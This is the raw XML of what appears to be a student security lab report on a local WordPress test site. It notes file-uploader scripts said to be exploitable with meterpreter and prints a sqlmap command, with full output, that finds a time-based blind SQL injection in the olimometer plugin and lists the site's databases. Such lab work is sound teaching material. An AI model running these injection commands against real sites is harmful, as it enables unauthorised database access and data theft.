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7E" w:rsidRPr="00213C7E" w:rsidRDefault="00213C7E" w:rsidP="00F207E3">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213C7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Milestone 5: Tag it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D242DE" w:rsidRPr="00F207E3" w:rsidRDefault="00213C7E" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I changed wp-content\themes\twentyfifteen\content-page.php file and changed its contents as shown in figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00213C7E" w:rsidRPr="00F207E3" w:rsidRDefault="00213C7E" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">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F207E3" w:rsidRPr="00F207E3" w:rsidRDefault="00F207E3" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F207E3" w:rsidRPr="00F207E3" w:rsidRDefault="00F207E3" w:rsidP="00F207E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Milestone 6: Going Deeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F207E3" w:rsidRPr="00F207E3" w:rsidRDefault="00F207E3" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I tracked the changes in the changelog and identified that the following two files have been removed in the fixed version.</w:t>
      </w:r>
      <w:r w:rsidR="00B946FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> These files were used for uploading file using XMLHTTPRequest which may be exploited by meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F207E3" w:rsidRPr="00F207E3" w:rsidRDefault="00F207E3" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin/scripts/FileU</w:t>
      </w:r>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ploader/fileuploader.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F207E3" w:rsidRDefault="00F207E3" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin/scrip</w:t>
      </w:r>
      <w:r w:rsidRPr="00F207E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ts/FileUploader/php.php </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74FD2" w:rsidRDefault="00B74FD2" w:rsidP="00F207E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00270BF0" w:rsidRDefault="00B74FD2" w:rsidP="00270BF0">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270BF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Milestone 7: Hello, </w:t>
      </w:r>
      <w:r w:rsidRPr="00270BF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap</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root@kali:~# sqlmap -u wpdistillery.dev/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 --dbs --threads=5 --random-agent --no-cast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__H__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___ ___[)]_____ ___ ___  {1.1.4#stable}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|_ -| . [)]     | .'| .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|___|_  [.]_|_|_|__,|  _|</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|_|V          |_|   http://sqlmap.org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starting at 00:47:59</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[00:47:59] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.201.0 Safari/532.0'</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[00:47:59] [INFO] testing connection to the target URL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checking if the target is protected by some kind of WAF/IPS/IDS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testing if the target URL is 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target URL is stable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[00:48:00] [INFO] testing if GET parameter 'olimometer_id' is dynamic</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[00:48:01] [WARNING] GET parameter 'olimometer_id' does not appear to be dynamic</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[00:48:01] [WARNING] heuristic (basic) test shows that GET parameter 'olimometer_id' might not be injectable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[00:48:02] [INFO] testing for SQL injection on GET parameter 'olimometer_id'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[00:48:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'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[00:48:06] [INFO] testing 'MySQL &gt;= 5.0 boolean-based blind - Parameter replace'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[00:48:06] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</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[00:48:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'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[00:48:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'</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[00:48:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'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[00:48:14] [INFO] testing 'MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)'</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[00:48:14] [INFO] testing 'MySQL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'PostgreSQL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'Microsoft SQL Server/Sybase inline queries'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[00:48:15] [INFO] testing 'PostgreSQL &gt; 8.1 stacked queries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[00:48:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries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[00:48:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'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[00:48:20] [INFO] testing 'MySQL &gt;= 5.0.12 AND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[00:48:32] [INFO] GET parameter 'olimometer_id' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind' injectable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it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes?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for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values?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[00:49:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'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[00:49:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found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[00:49:20] [INFO] checking if the injection point on GET parameter 'olimometer_id' is a false positive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GET parameter 'olimometer_id' is vulnerable. Do you want to keep testing the others (if any)?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sqlmap identified the following injection point(s) with a total of 91 HTTP(s) requests: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Parameter: olimometer_id (GET)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Type: AND/OR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Title: MySQL &gt;= 5.0.12 AND time-based blind</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    Payload: olimometer_id=1 AND SLEEP(5)</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the back-end DBMS is MySQL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web server operating system: Linux Ubuntu</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web application technology: Apache 2.4.16</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back-end DBMS: MySQL &gt;= 5.0.12</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fetching database names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[INFO] fetching number of databases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[00:50:05] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically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[00:50:05] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)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do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y</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[00:50:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions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4</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[00:50:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)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[00:51:01] [INFO] adjusting time delay to 1 second due to good response times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informa</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[00:51:42]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[00:51:42] [WARNING] increasing time delay to 2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tion_schema</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[00:53:23] [INFO] retrieved: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[00:53:32]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[00:53:32] [WARNING] increasing time delay to 3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mysq</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[00:54:34]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[00:54:34] [WARNING] increasing time delay to 4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[00:54:44]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[00:54:44] [WARNING] increasing time delay to 5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[00:55:08] [INFO] retrieved: p</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[00:55:53]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[00:55:53] [WARNING] increasing time delay to 6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[00:56:29]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[00:56:29] [WARNING] increasing time delay to 7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rformance_sche</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[01:02:24]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[01:02:24] [WARNING] increasing time delay to 8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lastRenderedPageBreak/>
        <w:t>ma</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[01:03:02] [INFO] retrieved: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[01:04:01] [WARNING] turning off pre-connect mechanism because of connection time out(s)</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[01:06:38]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[01:06:38] [WARNING] increasing time delay to 9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[01:06:50]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[01:06:50] [WARNING] increasing time delay to 10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[01:07:04]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[01:07:04] [WARNING] increasing time delay to 11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[01:07:19]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[01:07:19] [WARNING] increasing time delay to 12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[01:07:35] [ERROR] invalid character detected. retrying..</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ml:space="preserve">[01:07:35] [WARNING] increasing time delay to 13 seconds </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[01:07:52] [ERROR] unable to properly validate last character value ('\x81')..</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\x81cotchbox</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available databases [4]:</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`\x81cotchbox`</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information_schema</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mysql</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performance_schema</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[01:08:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/wpdistillery.dev'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE038C" w:rsidRPr="00CE038C"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p>
    <w:p w:rsidR="00270BF0" w:rsidRPr="00270BF0" w:rsidRDefault="00CE038C" w:rsidP="00CE038C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE038C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[*] shutting down at 01:08:43</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00270BF0" w:rsidRPr="0027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D3"/>
    <w:rsid w:val="00213C7E"/>
    <w:rsid w:val="00270BF0"/>
    <w:rsid w:val="003F45D3"/>
    <w:rsid w:val="004B6C8D"/>
    <w:rsid w:val="00B74FD2"/>
    <w:rsid w:val="00B946FD"/>
    <w:rsid w:val="00CE038C"/>
    <w:rsid w:val="00D242DE"/>
    <w:rsid w:val="00F2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41704-9090-42D9-9ACC-24136A40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3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C7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4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4053">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="375158210">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1600068246">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20755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Zakia Sultana</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kazi Zakia Sultana</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-19T04:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-19T05:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>